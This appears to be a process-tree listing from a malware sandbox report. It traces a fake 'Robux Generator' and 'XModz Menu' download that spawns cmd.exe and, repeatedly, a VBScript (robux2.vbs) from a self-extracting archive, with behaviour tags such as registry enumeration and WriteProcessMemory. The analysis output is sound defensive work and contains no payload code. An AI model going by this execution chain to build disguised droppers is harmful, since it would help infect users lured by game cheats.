C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,5798560574652247517,7466423797987752363,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_XModz.Menu.zip\XModz Menu.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_XModz.Menu.zip\XModz Menu.exe"2⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_robux generator0.zip\robux generator\Open me\readme.txt2⤵
-
C:\Users\Admin\Downloads\robux generator0\robux generator\Open me\Robux Generator.EXE"C:\Users\Admin\Downloads\robux generator0\robux generator\Open me\Robux Generator.EXE"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BOXLAU~2.CMD3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux.vbs"4⤵
-
C:\Users\Admin\Downloads\robux generator0\robux generator\Open me\gift.exe"C:\Users\Admin\Downloads\robux generator0\robux generator\Open me\gift.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BOXLAU~2.CMD3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
- Checks computer location settings
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\robux2.vbs"4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault318fc6e8hd10bh496ch95f0hed872b9c8a281⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb60b446f8,0x7ffb60b44708,0x7ffb60b447182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,2697923132958244213,2299967594367541526,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:32⤵
-
